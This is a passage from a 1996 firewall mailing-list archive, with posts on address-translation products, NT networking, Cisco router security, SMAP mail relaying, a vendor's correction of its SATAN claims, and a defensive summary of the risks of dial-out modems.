biggest threat otherwise. Our anonymous ftp archives have a lot of this stuff. Regards, Bob Bosen Enigma Logic Inc. 2151 Salvio St. #301 Concord, CA 94520 USA Tel: +1 510 827-5707 Internet: bbosen@netcom.com http://www.safeword.com ftp://ftp.safeword.com/download/ or ftp://ftp.enigmalogic.com ************************************************************************** * "It wasn't me!!! Somebody must have captured my username/password!!!" * ************************************************************************** From firewalls-owner Wed Feb 7 12:19:28 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA23583 for firewalls-outgoing; Wed, 7 Feb 1996 11:33:42 -0800 (PST) Received: from relay2.UU.NET (relay2.UU.NET [192.48.96.7]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id LAA23574 for ; Wed, 7 Feb 1996 11:33:29 -0800 (PST) Received: from cixgate by relay2.UU.NET with SMTP id QQabxu25738; Wed, 7 Feb 1996 14:31:13 -0500 (EST) Received: from manzanita.DEV.3Com.COM.noname ([139.87.180.206]) by cixgate (4.1/SMI-4.1/3com-cixgate-GCA-931027-01) id AA20468; Wed, 7 Feb 96 11:40:29 PST Received: by manzanita.DEV.3Com.COM.noname (4.1/SMI-4.1) id AA00903; Wed, 7 Feb 96 11:25:07 PST Date: Wed, 7 Feb 96 11:25:07 PST From: bobk@manzanita.DEV.3Com.COM (Bob Konigsberg) Message-Id: <9602071925.AA00903@manzanita.DEV.3Com.COM.noname> To: firewalls@greatcircle.com Subject: Cost of Address Translation systems Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Can anyone give me the costs (hardware and software) for address translation systems. Hopefully along with their names. Thanks, BobK From firewalls-owner Wed Feb 7 13:09:10 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA28114 for firewalls-outgoing; Wed, 7 Feb 1996 12:49:21 -0800 (PST) Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id MAA28103 for ; Wed, 7 Feb 1996 12:49:16 -0800 (PST) From: long-morrow@CS.YALE.EDU Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU (8.7.1/res.host.cf-4.0) with ESMTP id PAA09349; Wed, 7 Feb 1996 15:48:13 -0500 (EST) sender long-morrow@CS.YALE.EDU for Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-8.7.1/res.client.cf-4.0) id PAA05677; Wed, 7 Feb 1996 15:48:11 -0500 (EST) Date: Wed, 7 Feb 1996 15:48:11 -0500 (EST) Message-Id: <199602072048.PAA05677@SPARKY.CF.CS.YALE.EDU> To: doug@fc.com, firewalls@GreatCircle.COM Subject: Re: NT Firewalls/Web Servers Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Doug@fc.com wrote: >Does anyone know of any good NT Firewalls and Web Servers? Have you looked at WinGate? It is a proxying system for Windows 95 and NT which allows you to use one machine which dials up an ISP to act as a proxy for your entire network. It can also straddle two ethernets instead. They have proxies similar to TIS FWTK, a nice generic proxy with flexible configuration rules, a SOCKs implementation. There are a number of different good Web Servers for NT (Netscape's, Microsoft's, O'Reilly & Assoc. WebSite, etc.): http://home.netscape.com/ http://www.microsoft.com/ http://website.ora.com/ - Morrow From firewalls-owner Wed Feb 7 13:31:51 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA23659 for firewalls-outgoing; Wed, 7 Feb 1996 11:35:06 -0800 (PST) Received: from foxtrot.worldcom.com (foxtrot.worldcom.com [198.64.193.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id LAA23644 for ; Wed, 7 Feb 1996 11:34:49 -0800 (PST) Received: (from smtp@localhost) by foxtrot.worldcom.com (8.7.1/8.6.9) id NAA19803 for ; Wed, 7 Feb 1996 13:24:34 -0600 (CST) Received: from samba.worldcom.com(198.64.193.32) by foxtrot.worldcom.com via smap (V1.3) id sma019734; Wed Feb 7 13:23:53 1996 Received: (smtp@localhost) by samba.worldcom.com (8.6.11/8.6.9) id NAA08549 for ; Wed, 7 Feb 1996 13:23:51 -0600 Received: from samba.worldcom.com(198.64.193.32) by samba.worldcom.com via smap (V1.3) id sma008544; Wed Feb 7 13:23:28 1996 Date: Wed, 7 Feb 1996 13:23:28 -0600 (CST) From: Robert Dana Reply-To: Robert Dana Subject: I want details!!! Re: NT's TCP/IP stack To: firewalls@greatcircle.com In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk OK, I'm getting really frustrated about the lack of details about NT's deficiencies. I couldn't care less about OS bigotry- I'll use whatever systems meet my needs (which often include security). I have seen, over and over again, posts that basically say "I've personally verified that NT sucks for {security, networking, multitasking, Internet services}. Don't believe the MS marketing hype". For example: Scott Barman writes: > Hopefully, when folks put NT on the internet, they will find the same > thing I found through experimentation: it has multitasking that can't > get out of its own way, it can't handle the load of a medium-low > environment, and if something goes wrong, there isn't a quick interface > to fix things (by passing that maze of twisty little menus all > different!). [...] > Yea, it's called living the hype and beliving the b.s. from marketing > machines. No controversy here--especially when I don't believe what I > read or hear from know M.$.... err... b.s. artists. I don't mean to single Scott out- his is just the most recent example. We can bitch about MS's unsubstantiated marketing claims all we want, but making similarly unsubstantiated claims opposing them doesn't help at all. Exactly what are the deficiencies of the IP or TCP implementations of NT for the environment most of us care about (IP over ethernet)? Why won't a firewall on NT be capable of handling a connection faster than 64k? One of the most valuable things about forums like this is the potential to share information that cuts through all the BS that floats around out there in the form of marketing materials and vendor-biased trade publications. I'm constantly disappointed about how little valuable knowledge is really posted. And please- keep your OS religion to yourself. Sure, UNIX is what I'm most comfortable with for now, but that doesn't change the fact that I have to deal with NT whether I want to or not. GIVE US FACTS. -Robert -- Robert Dana (713) 650-6522 x240 Director of Network Services WorldCom, the International Network for Lotus Notes From firewalls-owner Wed Feb 7 13:39:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA29407 for firewalls-outgoing; Wed, 7 Feb 1996 13:16:19 -0800 (PST) Received: from eagle.wd.cubic.com ([149.63.94.9]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA29402 for ; Wed, 7 Feb 1996 13:16:15 -0800 (PST) Received: (mischler@localhost) by eagle.wd.cubic.com (8.6.9/8.3) id NAA08977; Wed, 7 Feb 1996 13:15:20 -0800 Date: Wed, 7 Feb 1996 13:15:20 -0800 From: Dave Mischler Message-Id: <199602072115.NAA08977@eagle.wd.cubic.com> To: bobk@manzanita.DEV.3Com.COM, firewalls@GreatCircle.COM Subject: Re: Cost of Address Translation systems Sender: firewalls-owner@GreatCircle.COM Precedence: bulk IPRoute runs on a PC and is shareware for $50. http://www.mischler.com/iproute/ From firewalls-owner Wed Feb 7 13:42:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA29452 for firewalls-outgoing; Wed, 7 Feb 1996 13:17:24 -0800 (PST) Received: from count04.mry.scruznet.com (count04.mry.scruznet.com [204.147.227.68]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id NAA29443 for ; Wed, 7 Feb 1996 13:17:17 -0800 (PST) From: firewalls@count04.mry.scruznet.com Received: from count04.mry.scruznet.com (localhost [127.0.0.1]) by count04.mry.scruznet.com (8.7.3/8.7.1) with ESMTP id NAA04755; Wed, 7 Feb 1996 13:09:56 -0800 (PST) Message-Id: <199602072109.NAA04755@count04.mry.scruznet.com> To: bobk@manzanita.DEV.3Com.COM (Bob Konigsberg) cc: firewalls@GreatCircle.COM, firewalls@count04.mry.scruznet.com Subject: Re: Cost of Address Translation systems In-reply-to: Your message of "Wed, 07 Feb 1996 11:25:07 PST." <9602071925.AA00903@manzanita.DEV.3Com.COM.noname> Date: Wed, 07 Feb 1996 13:09:56 -0800 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk try darren reed... he's on the list with ip-filter 3.02b it has the feature you are requesting From firewalls-owner Wed Feb 7 14:16:47 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA01538 for firewalls-outgoing; Wed, 7 Feb 1996 13:52:15 -0800 (PST) Received: from relay2.smtp.psi.net (relay2.smtp.psi.net [38.8.188.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA01533; Wed, 7 Feb 1996 13:52:10 -0800 (PST) Received: from radisys.radisys.com by relay2.smtp.psi.net (8.6.12/SMI-5.4-PSI) id QAA22881; Wed, 7 Feb 1996 16:50:50 -0500 Received: from msmail.radisys.com by radisys.radisys.com id aa01808; 7 Feb 96 13:46 PST Received: by msmail.radisys.com with Microsoft Mail id <31191E61@msmail.radisys.com>; Wed, 07 Feb 96 13:49:21 PST From: Jesse Gambetti To: firewalls-owner Cc: firewalls Subject: Firewall Date: Wed, 07 Feb 96 13:48:00 PST Message-ID: <31191E61@msmail.radisys.com> X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Our company is currently running a SCO box as our gateway w/ a netblazer doing packet filtering and a 14.4k link to the net. I've taken over internet as one of my primary responsibilities here and working with the engineers that maintained the inet access here before we've decided to switch to BSDi on our gateway, we ordered a CISCO firewall router that will support a new 256k partial frame t1. Being new to firewalls myself I'm kind of reading as much as I can while learning the admin side of BSDi. My question is this, will the Cisco router provide enough security for our company? We are starting to become very concerned with security. If you need any other info I'll be happy to provide it if I know it. Jesse Gambetti IS Technician jgambetti@radisys.com From firewalls-owner Wed Feb 7 15:10:03 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA02439 for firewalls-outgoing; Wed, 7 Feb 1996 14:08:40 -0800 (PST) Received: from smtp-gw01.ny.us.ibm.net ([165.87.194.252]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA02434 for ; Wed, 7 Feb 1996 14:08:35 -0800 (PST) From: pcuser@slip67-241.ny.us.ibm.net Received: (from uucp@localhost) by smtp-gw01.ny.us.ibm.net (8.6.9/8.6.9) id WAA65987 for < @smtp-gw01.ny.us.ibm.net:Firewalls@GreatCircle.COM>; Wed, 7 Feb 1996 22:07:43 GMT Message-Id: <199602072207.WAA65987@smtp-gw01.ny.us.ibm.net> Received: from slip67-241.ny.us.ibm.net(129.37.67.241) by smtp-gw01.ny.us.ibm.net via smap (V1.3mjr) id smaNZYDe7; Wed Feb 7 22:07:36 1996 Date: Tue, 6 Feb 96 10:04:23 PST Subject: Firewalls Product Comparison To: @smtp-gw01.ny.us.ibm.net:Firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi guys, I need to prepare a comparative study between Sunīs Firewall 1 and IBM NetSP, for the end of this week. Does anyone Knows where I could find some interesting articles concerning both of these products?? Any help woul be appreciated. Wilmer Caripe EMSCA - ENGINEERING AND MANUFACTURING SYSTEMS CARACAS, VENEZUELA From firewalls-owner Wed Feb 7 15:18:24 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA02806 for firewalls-outgoing; Wed, 7 Feb 1996 14:15:13 -0800 (PST) Received: from ibmmail.COM (ibmmail.com [199.171.26.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA02801 for ; Wed, 7 Feb 1996 14:15:08 -0800 (PST) Received: from IMXGATE.COM by ibmmail.COM (IBM VM SMTP V2R3) with BSMTP id 6453; Wed, 07 Feb 96 17:14:09 EST Received: from oceanspray.com by imxgate.com (IBM VM SMTP V2R3) with TCP; Wed, 07 Feb 96 17:05:14 EST Received: from OCNSPRAY-Message_Server by oceanspray.com with Novell_GroupWise; Wed, 07 Feb 1996 17:11:18 -0500 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Wed, 07 Feb 1996 17:05:24 -0500 From: LLOYD HARTE To: firewalls@greatcircle.com Subject: RMON Data Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Greetings, This is a little outside of a firewall question but I was wondering if any one could point me in the direction of where I could find formulas for analyzing RMON data. I want to calculate things like utilization, error rates, etc. I have looked at one tool, Axon LANreporter but it only looks at one days' worth of info and I would like to review, weeks, months, etc. Any assistance would be great! LHARTE@OCEANSPRAY.COM From firewalls-owner Wed Feb 7 15:32:25 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA01436 for firewalls-outgoing; Wed, 7 Feb 1996 13:50:16 -0800 (PST) Received: from pfg-bh.principal.com (pfg-bh.principal.com [204.167.169.66]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA01402 for ; Wed, 7 Feb 1996 13:49:52 -0800 (PST) Received: (from uucp@localhost) by pfg-bh.principal.com (8.6.12/8.6.11) id PAA21483 for ; Wed, 7 Feb 1996 15:51:14 -0600 Received: from mailhub1.principal.com(162.131.2.16) by pfg-bh.principal.com via smap (V1.3) id sma021476; Wed Feb 7 15:50:45 1996 Received: from pfgmvs1.principal.com by mailhub1.principal.com; Wed, 7 Feb 96 15:45:54 -0600 Received: from PFGMVS1 by PFGMVS1 (IBM MVS SMTP V3R1) with BSMTP id 0414; Wed, 07 Feb 96 15:48:12 CST Date: Wed, 7 Beb 96 15:47:41 CST To: Cc: "*internet " <*INTERNE%EMC2TNN@PFGMVS1.principal.com> From: "HEROLD.BECKY" Subject: Dial-out risks Message-Id: <31191d936ebc002@mailhub1.principal.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk An important key to the success of a firewall is ensuring employees use it! This can require quite the sales job. In order to get buy-in (hopefully going from top management down through the ranks) it is necessary (in our organization anyway) to explain to people why what they want to do is a bad thing for the corporate network. One of the bad things people will want to do is install modems on PCs that are attached to the WAN and use them for "dial-out only". It is a challenging task to convince them that doing this DOES create a risk, even if they are using a non-DID phone line. (Especially if the WAN has tens of thousands of nodes spread across a geographically huge area.) At the beginning of January I posted a request for information on specific risks in putting modems on PCs that (supposedly) will be used for dial-out access only. It is assumed that the PCs are running IP, and may not be going directly to the Internet, but dialing out to other public networks such as AOL, CompuServe, Prodigy, etc.... It is also assumed that the PC may have the full set of Internet services installed, which we've found is the default for many OSs, and which, if it is not the default, can easily be loaded by most people determined they want to use the services. This information will be used in awareness messages and discussions with employees about why, typically, they need to access the Internet through the firewall. I've had some requests to post the responses I received. The following is a summary of the responses, along with some additional information I found after I posted the question. Much thanks to those of you who helped me! Since several of the responses were similar, I'm omitting attributions to them. Please, those of you who are more versed in the technical aspects of these risks than I, let me know any errors you see! Also, please contribute more risks and methods of reducing them that you can think of. ----------------------------------------------------------------------------- * Since IP is a two-way protocol, someone could gain access to the dial-out PC hard drive (and any networked system) during the dial-out session. This is true even when using the non-DID line (which basically protects against war-dialers in the event the dial-out user leaves the modem on all the time). * Viruses and trojans can be placed on the dial-out hard drive * Any files copied to diskettes and placed on the network could cause problems network-wide * Trojans can collect such goodies as passwords, credit card numbers, etc...anything passing over the network lines * The dial-out PC could be used as a repository. * If the person dials-out consistently around the same time each day, or specific days of the week, a hacker can identify when the person is connected and plant the malicious code on the PC or network during those times. * Since Windows 95, Windows for Workgroups, and other systems have remote communications capabilities built in, it becomes a bigger risk to have dial-out access because of potential macros included in files shared through these systems. It is best to turn these options off when installing the OS.) * FAX systems can be used to transfer files as data rather than images under certain sircumstances. A typical use would be to send Word documents with a hole for Word viruses. * The OS of networked PCs may be screwed up by the mixing and matching of IP stacks and clients that this sort of thing implies. For example, one incarnation of C$'s software unobviously messed with WINSOCK.DLL for one respondant which led to lots of problems trying to debug. The supportability of allowing people to mess with their PC's OS when installing dial-out software/modem needs to be considered. * IP Spoofing * Session hijacking * Users with little PC/systems knowledge installing systems on their dial-out PC that ultimately opens up the entire network (eg., enabling the IP routing feature). * Dial-out employees allowing non-employees (eg., friends, family, etc.) to use their dial-out machine as a dial-in machine to bounce them to the Internet, resulting once again in opening up the entire network. {I don't have the technical details of how this could be done....does anyone care to share?} * Denial of service attacks * Files on the dial-out PC may be copied, deleted, and possibly modified. * Files may also be copied to, deleted, or modified on the other systems attached to the network. * Changes may be made to network systems which could prevent access to the network by legitimate users. If anyone could point to a site with more techinical information about these attacks, or provide information to this list, that would be great! Here were the suggestions for dealing with the threats: * Have strong policy clearly indicating acceptable remote access methods {Definitely agree!} * Don't allow full network services on the PCs {Great advice...but how? Is there a monitoring device that can determine which PCs are running the services? How are you going to keep 18,000+ people, many of whom are PC-literate enough, from loading the services? Policies are good and necessary, but they are not preventive controls.} * Educate the employees of the risks so they won't be as likely to do something inadvertantly risky. {Absolutely agree! Will definitely help the 80% - 90% of people that want to do the right thing.} * Scan all PCs for viruses regularly, and downloaded files immediately. {Yes!} * Check PCs for Trojans regularly. {What's the most efficient way to do this?} * Encrypt confidential/proprietary data files residing on PCs and attached computer systems. {Getting info on this by subscribing to cypherpunks} * Use non-DID (outgoing calls only) phone lines to eliminate risks created when people leave their modems on, but are not actively connected. * Do a network/risk assessment to determine where your weaknesses are. * Require users to sign a usage policy. * Require users to pass through an authentication server to dial-out, using a single-use password token. Thanks, Becky Herold, Sr. Systems Analyst, Information Protection herold.becky@principal.com =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- The opinions expressed here are strictly my own and do not necessarily represent those of my employer. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= From firewalls-owner Wed Feb 7 15:38:52 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA02199 for firewalls-outgoing; Wed, 7 Feb 1996 14:03:47 -0800 (PST) Received: from gaia.aoainc.com (gaia.aoainc.com [199.93.216.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA02189 for ; Wed, 7 Feb 1996 14:03:35 -0800 (PST) Received: (from uucp@localhost) by gaia.aoainc.com (8.6.12/8.6.9) id RAA21988; Wed, 7 Feb 1996 17:02:43 -0500 Received: from aoa.aoainc.com(199.93.217.20) by gaia.aoainc.com via smap (V1.3) id sma021985; Wed Feb 7 17:02:21 1996 Received: from albedo.aoainc.com. (albedo.aoainc.com [199.93.217.155]) by aoa.aoainc.com (8.6.9/8.6.9) with SMTP id RAA27113; Wed, 7 Feb 1996 17:02:20 -0500 Message-ID: Date: Wed, 7 Feb 96 17:01:04 -0400 From: "Richard L. Snow" Subject: Re: firewalls, email, and dns To: "Lehrer, Neil" , firewalls@GreatCircle.COM X-Mailer: VersaTerm Link v1.1.1 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >hi, > >our smtp mail server is an smtp/mhs gateway that runs on DOS. since it >does not have the traditional sendmail vulnerabilities can I/should I >allow smtp traffic through a firewall [] Well, it's pretty easy to use a mail forwarder such as SMAP in the TIS firewalls toolkit. If your firewall is unix you can replace the sendmail daemon with this program which is short enough that you could actualy figure out what the code is doing. The traditional argument is that if the program is complex enough that you can't tell what it's behavior will be, then there is a high risk there is a hole in there which you don't know about. -Rich Rich Snow rich@aoainc.com (617)864-0201 -----------------------------------------------* Adaptive Optics Associates, Inc. 54 Cambridgepark Dr., Cambridge, MA. 02140 From firewalls-owner Wed Feb 7 15:47:58 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA02198 for firewalls-outgoing; Wed, 7 Feb 1996 14:03:45 -0800 (PST) Received: from grendel.texas.net (grendel.texas.net [204.96.23.204]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA02188 for ; Wed, 7 Feb 1996 14:03:35 -0800 (PST) Received: (from stend@localhost) by grendel.texas.net (8.6.10/8.6.9) id PAA09076; Wed, 7 Feb 1996 15:25:08 -0600 Date: Wed, 7 Feb 1996 15:25:08 -0600 From: Sten Drescher Message-Id: <199602072125.PAA09076@grendel.texas.net> To: "Kenneth J. Stephens" CC: goertzek@wangfed.com, firewalls@GreatCircle.COM In-reply-to: "Kenneth J. Stephens"'s message of Tue, 6 Feb 1996 10:40:05 -0500 (EDT) Subject: Re: Survey References: <199602061540.KAA18136@Fe3.rust.net> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk "Kenneth J. Stephens" said: KJS> If the magazine publishers forced the issue date onto all of KJS> their reprints the vendors would have little use for the KJS> reprints. The date stamp would obsolete the reprint so quickly KJS> that the vendor would look foolish for distributing old info. KJS> One of the hazards of a dynamic industry. Given the number of computer manufacturers which clearly include the DATE of the publication in which their products were selected a Best Buy/Editors Choice/etc., this is ludicrious. Personally, if I were to receive an undated reprint of a magazine review as part of a products promotional literature, my most favorable reaction would be to place it in the circular file, with my most probable being wondering why they don't want me to know how old the review is. OTOH, if I received reprints dated, say, June 1994, May 1995, and September 1995, that would show me that not only does this company develop a good product, but that they maintain a good product, which, to me, is extremely important. -- #include /* Sten Drescher */ Unsolicited email advertisements will be proofread for a US$100/page fee. CDA Bait: Look, I have two daughters who haven't been laid yet. How about you rape them right here, instead of my guests? Gen 19:8 From firewalls-owner Wed Feb 7 15:51:57 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA02485 for firewalls-outgoing; Wed, 7 Feb 1996 14:09:10 -0800 (PST) Received: from icicle.winternet.com (icicle.winternet.com [198.174.169.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id OAA02442 for ; Wed, 7 Feb 1996 14:08:55 -0800 (PST) Received: from parka (dufresne@parka.winternet.com [198.174.169.9]) by icicle.winternet.com (8.7.3/8.7.2) with ESMTP id QAA10210; Wed, 7 Feb 1996 16:07:40 -0600 (CST) Received: (from dufresne@localhost) by parka (8.6.12/8.6.12) id QAA03253; Wed, 7 Feb 1996 16:07:39 -0600 Posted-Date: Wed, 7 Feb 1996 16:07:39 -0600 Date: Wed, 7 Feb 1996 16:07:38 -0600 (CST) From: Ron DuFresne To: Chris Jenkins cc: winnt-l@eva.dc.lsoft.com, jeromie@garrison.com, firewalls@GreatCircle.COM, SATEESHB@inf.com Subject: Re: NT's TCP/IP stack + NetManage NEWT conflict. -Reply In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 7 Feb 1996, Chris Jenkins wrote: > all of the newest (and even WFW311) come with a free TCPIP stack. > Third party applications like Chameleon, LanWorkPlace, etc....come with > their own stacks. In most cases, you should be able to get applications > (Telnet, FTP, mail, etc) from one third-party product to work over anothers > TCP/IP stack. This is where the WINSOCK standard comes in. > > More specialized TCP/IP functions running on Windows (such as XServer, > 3270, etc) may require a stack/Winsock specific to that particular product. > > Since MS gives you TCP/IP and WINSOCK, most third party applications > should be able to run. If I recall correctly, I think that some of Chameleons > applications will run on MS tcp/ip stack. Yes, this is true, but you don't want to run newt with the other stack active. At one site we worked with we found wfw311 and newt in continual conflict. When just running newt, a version prior to 5.0 <3.5-4.0 I think we ran> it was very unstable. We weren't very impressed and ended up tossing newt to the sidelines. Later, Ron DuFresne ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. From firewalls-owner Wed Feb 7 16:07:26 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA05145 for firewalls-outgoing; Wed, 7 Feb 1996 14:46:20 -0800 (PST) Received: from usia.gov (XGATE.USIA.GOV [198.67.64.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA05132 for ; Wed, 7 Feb 1996 14:46:15 -0800 (PST) Received: from NetWare MHS (SMF70) by usia.gov via Connect2-SMTP 4.00; Wed, 7 Feb 96 17:45:57 -0500 Message-ID: <2C1D19310136C8D1@usia.gov> Date: Wed, 7 Feb 96 17:44:07 -0500 From: "Lehrer, Neil" Organization: USIA To: firewalls@greatcircle.com Subject: fw-1 and smapd X-mailer: Connect2-SMTP 4.00 MHS to SMTP Gateway Sender: firewalls-owner@GreatCircle.COM Precedence: bulk hi, are any of you firewall-1 customers putting smap on your firewall as the mail redirector? any other way to do this? i didn't see anything in the fw-1 manual other than having a rule that lets outside email go through the wall to your inside mail server and trust that? cc to my email address would be great. thanks. Regards +++++++++++++++++++++++++++++++++++++++ + Neil Lehrer + U.S. Information Agency + Networks and Systems Support Division + + voice 202 619-0903 + fax 202 619-3883 + internet nlehrer@usia.gov + + "oh what a tangled net we weave + when we seek to retrieve." + +++++++++++++++++++++++++++++++++++++++ From firewalls-owner Wed Feb 7 16:09:18 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA06460 for firewalls-outgoing; Wed, 7 Feb 1996 15:07:44 -0800 (PST) Received: from mail.ganton-mcr.com (mail.ganton-mcr.com [206.233.102.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA06448 for ; Wed, 7 Feb 1996 15:07:36 -0800 (PST) Received: from kia.mazama.com (sfsp95.slip.net [204.160.88.159]) by mail.ganton-mcr.com (8.6.11/8.6.9) with SMTP id PAA26783; Wed, 7 Feb 1996 15:12:36 -0800 Date: Wed, 7 Feb 1996 15:05:27 -0800 (PST) From: Larry Stelmat To: firewalls@greatcircle.com cc: info@mazama.com Subject: Re: Mazama Packet Filter: Misleading advertising In-Reply-To: <311763D4.3843@csc.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We'd like to thank Darren Reed for pointing out a poorly worded segment of our old product description. Our intent was to communicate that we had run Satan on several MPF installations and that MPF, properly configured, managed to detect and stop most of the attacks that SATAN attempts to use. The history was that earlier information did not mention SATAN, and we got frequent e-mail to asking us if we had tested MPF with SATAN. So around summer we started mentioning SATAN in later sales information. After being revised four times or more by three different people, the original intent and statement was more than a bit mangled. It is true that the current version of MPF does detect hosts that are scanning port space or address space. At MSL, our primary mission is to build a better product at a lower price. Unfortunately we have a limited number of resources. Our primary resources go into development and testing of MPF with marketing trailing as dead last. The result of which is our product is well tested (including documentation), but our sales material is crafted quickly and without much time for review. We again want to thank Darren for pointing out our problem. The efforts to ensure that published information is accurate makes the Internet a great place to do business. David Bonn, President Mazama Software Labs david@mazama.com > > The following appears on one of their web pages: > (http://www.mazama.com/mpf12desc.html): > ... > TECHNICAL SECURITY FEATURE LIST > > > _________________________________________________________________ > > > > > * Blocking of all services which are not explicitly enabled. > * Blocking of ICMP Redirect Packets. > * Blocking of IP Source Route options. > * Blocking of Spoofed IP addresses. > * Blocking of Spoofed IP fragments. > * Dangerous services such as rsh/rlogin, X window, Openwindows, > NFS, > and other RPC services are blocked by default. > * TCP Services use SYN/ACK checking to verify the direction of all > TCP connections. > * We have used SATAN to analyze MPF installations and verified that > the above security problems are solved by MPF. The current > version > of MPF can detect port scans from SATAN and automatically block > all packets from a host running SATAN. > ... > > The last item is what I would draw your attention to. > > SATAN does *NOT* test all of the above. In fact, it only does the > first. > Well, to be pedantic, it doesn't look for blocked services, but scans > looking for services which are active and are possible avenues for a > breakin. > That is unless they developed their own plug-in tests for SATAN, which > their web page doesn't brag about, so I'll assume to not be the case > O:). > > Maybe they assumed that their DHB (Dynamic Host Blocking) solved > everything > when it blocks out an entire host when it notices a SATAN style attack. > > Now, if they had of mentioned ISS, I might take it more seriously and > assume > that maybe 3 or more of the above had been checked... > > IMHO, that particular page stinks...(you can find other rich comments > there, > too...)...probably from Marcus's dead chicken that they waved around and > dropped there ;) > > darren > > (p.s. chris, if you get an order from a certain company, you owe me one > ;-) > > From firewalls-owner Wed Feb 7 16:12:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA04597 for firewalls-outgoing; Wed, 7 Feb 1996 14:38:34 -0800 (PST) Received: from grendel.texas.net (grendel.texas.net [204.96.23.204]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA04547 for ; Wed, 7 Feb 1996 14:38:10 -0800 (PST) Received: (from stend@localhost) by grendel.texas.net (8.6.10/8.6.9) id PAA09076; Wed, 7 Feb 1996 15:25:08 -0600 Date: Wed, 7 Feb 1996 15:25:08 -0600 From: Sten Drescher Message-Id: <199602072125.PAA09076@grendel.texas.net> To: "Kenneth J. Stephens" CC: goertzek@wangfed.com, firewalls@GreatCircle.COM In-reply-to: "Kenneth J. Stephens"'s message of Tue, 6 Feb 1996 10:40:05 -0500 (EDT) Subject: Re: Survey References: <199602061540.KAA18136@Fe3.rust.net> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk "Kenneth J. Stephens" said: KJS> If the magazine publishers forced the issue date onto all of KJS> their reprints the vendors would have little use for the KJS> reprints. The date stamp would obsolete the reprint so quickly KJS> that the vendor would look foolish for distributing old info. KJS> One of the hazards of a dynamic industry. Given the number of computer manufacturers which clearly include the DATE of the publication in which their products were selected a Best Buy/Editors Choice/etc., this is ludicrious. Personally, if I were to receive an undated reprint of a magazine review as part of a products promotional literature, my most favorable reaction would be to place it in the circular file, with my most probable being wondering why they don't want me to know how old the review is. OTOH, if I received reprints dated, say, June 1994, May 1995, and September 1995, that would show me that not only does this company develop a good product, but that they maintain a good product, which, to me, is extremely important. -- #include /* Sten Drescher */ Unsolicited email advertisements will be proofread for a US$100/page fee. CDA Bait: Look, I have two daughters who haven't been laid yet. How about you rape them right here, instead of my guests? Gen 19:8 From firewalls-owner Wed 